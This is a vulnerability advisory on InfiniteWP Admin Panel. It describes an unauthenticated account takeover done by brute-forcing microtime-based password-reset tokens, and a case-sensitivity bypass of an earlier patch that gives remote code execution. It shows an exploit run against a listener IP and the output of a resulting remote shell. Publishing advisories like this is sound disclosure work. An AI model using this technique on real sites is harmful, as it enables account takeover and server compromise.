A vulnerability in InfiniteWP allows unauthenticated users to log-in if they know an email address of one of the users in the system, this is done through a flaw in the password reset mechanism of the product. An additional vulnerability allows the attacker to achieve Remote Code Execution.
This advisory refers to two vulnerabilities: the first was previously reported by
Hermann Weiss (hw at whitehack.de) – which the vendor took months to fix, during which we found it too – plus another one previously unknown.
InfiniteWP is “free self hosted, multiple WordPress site management solution. It simplifies your WordPress tasks with a click of a button”. For more information visit https://infinitewp.com/.
The password reset link is created by InfiniteWP Admin Panel by executing the code in
function userLoginResetPassword($params) (controllers/appFunctions.php line 1341) :
$userDets['userID'] is the target user identifier and
$params["email"] is their email.
An attacker only needs the user id, user email and the value produced by the call to
microtime(true) in order to create the correct link and reset the victim’s password:
login.php?view=resetPassword&errorMsg=resetPasswordEmailNotFoundmeans the email is not registered, otherwise it is;
microtime(true)is the current UNIX timestamp with microseconds (php.net/microtime), hence it can be guessed by using the HTTP “Date” header value (seconds precision) as a reference point for the dictionary creation.
By creating a dictionary list with all the possible
resetHash values it is possible to guess the correct password reset token and reset the victim’s password. The attack will be successfull with a maximum of 1 million tries over a 24 hours time window (the password reset token expires after 24 hours), which is a reasonable timing. During the Proof-of-concept tests, the average total time required to successfully exploit the issues has been of 1 hour; that said the timings might differ depending on the specific network speed/congestion/configuration and the microtime call output.
At this point an attacker is able to reset the victim’s password and gain access to the Infinite WP Admin Panel, the next vulnerability will cover how to achieve authenticated Remote Code Execution on the host machine.
In 2016 a remote code execution vulnerability was found in Infinite WP Admin Panel 2.8.0, which affected the
/ajax.php API endpoint, the details of which are publicly available.
As written in the advisory, the vulnerability was fixed by adding a call to
function checkDataIsValid($action) (controllers/panelRequestManager.php line 3782):
However that check doesn’t take in consideration that PHP function names are case insensitive: by using “addfunctions” (notice the lowercase “f”) it is possible to bypass the patch and achieve remote code execution.
-d to enable the debug mode which outputs a more verbose log.
$ ./iwp-userloginsetpassword-unauthenticated-account-takeover-and-rce-exploit.py -e 'firstname.lastname@example.org' -rh http://vm.local/iwp -lh 10.10.10.13 2020-08-13 14:45:29,496 - INFO - initiating password reset... 2020-08-13 14:45:29,537 - INFO - reset token has been generated at 1597322728, starting the bruteforce... 2020-08-13 14:45:29,538 - INFO - starting with uid 1... 2020-08-13 14:50:05,318 - INFO - tested 50000 (5.0%) hashes so far for uid 1... 2020-08-13 14:54:49,094 - INFO - tested 100000 (10.0%) hashes so far for uid 1... 2020-08-13 14:59:15,282 - INFO - tested 150000 (15.0%) hashes so far for uid 1... 2020-08-13 15:04:19,933 - INFO - tested 200000 (20.0%) hashes so far for uid 1... 2020-08-13 15:08:55,162 - INFO - tested 250000 (25.0%) hashes so far for uid 1... 2020-08-13 15:13:38,524 - INFO - tested 300000 (30.0%) hashes so far for uid 1... 2020-08-13 15:15:43,375 - INFO - password has been reset, you can now login using email@example.com:msCodWbsdxGGETswnmWJyANE/x2j6d9G 2020-08-13 15:15:43,377 - INFO - removing from the queue all the remaining hashes... 2020-08-13 15:15:45,431 - INFO - spawning a remote shell... /bin/sh: 0: can't access tty; job control turned off $ id uid=1(daemon) gid=1(daemon) groups=1(daemon) $ uname -a Linux debian 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux $ exit *** Connection closed by remote host ***
An unauthenticated user can takeover the admin account and then carry out a Remote Code Execution.
Upgrade Infinite WP version 2.15.7 or later (Note: we didn’t verify the patch).
Hermann Weiss (hw at whitehack.de)publishes their advisory about the account takeover issue only (the first discussed above)
Hermann Weiss (hw at whitehack.de)for being the first to discover the account takeover vulnerability
23 December 2020